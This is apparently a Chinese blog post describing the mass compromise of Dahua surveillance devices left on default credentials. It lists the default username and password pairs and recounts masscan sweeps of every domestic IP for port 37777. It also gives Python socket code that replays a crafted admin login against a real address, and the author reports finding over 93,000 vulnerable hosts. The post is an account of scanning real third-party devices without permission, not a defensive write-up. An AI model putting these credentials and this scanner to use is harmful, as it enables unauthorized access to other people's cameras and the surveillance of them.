- A+
北京方便面 | 2015-08-26 19:09
先看这里:
大量浙江大华监控设备弱口令漏洞
WooYun: 大量浙江大华监控设备弱口令漏洞
大华监控设备默认是开启HTTP端口80和TCP端口37777的
设备默认弱口令:
user:admin pass:admin 管理权限
user:default pass:user 用户默认登陆帐号
user:888888 pass:admin
user:666666 pass:user
一、初步筛选出开放37777端口的ip
借用小伙伴的vps扫描了国内全部ip的37777端口,使用masscan半个小时扫描完成,服务器的发包速度能够达到 180kpps吧,最后得到的结果开放37777端口的ip共计60万多(652488)。
二、扫描存在漏洞的ip
得到了开放37777端口的ip列表,我们需要写个脚本去批量扫描获取存在漏洞的ip,想到的方式是利用socket模拟登陆,根据返回包判断是否存在漏洞。
1、抓取正常登陆包
代码片段sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('192.168.1.90',37777))
sock.listen(5)
while True:
connection,address = sock.accept()
try:
connection.settimeout(5)
buf = connection.recv(1024)
f=open("37777data.txt",'a')
f.write(buf)
f.close()
2、socket简单模拟正常登陆并判断返回包
代码片段sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('58.246.234.102',37777))
time.sleep(2)
#send_buf = open('37777data.txt', 'rb').read()
##print binascii.b2a_hex(send_buf)
send_buf = ('\xa0\x00\x00\x60\x00\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x04\x01\x00\x00\x00\x00\xa1\xaa')
sock.send(send_buf)
(数据要binascii.b2a_hex编码一下才好做对比)
脚本写好,同样是放在小伙伴的vps上,妈蛋(´Д`),耗时19个小时,93219个ip。
$("img").load(function(){ if($(this).attr("width")>640) $(this).attr("width",640); });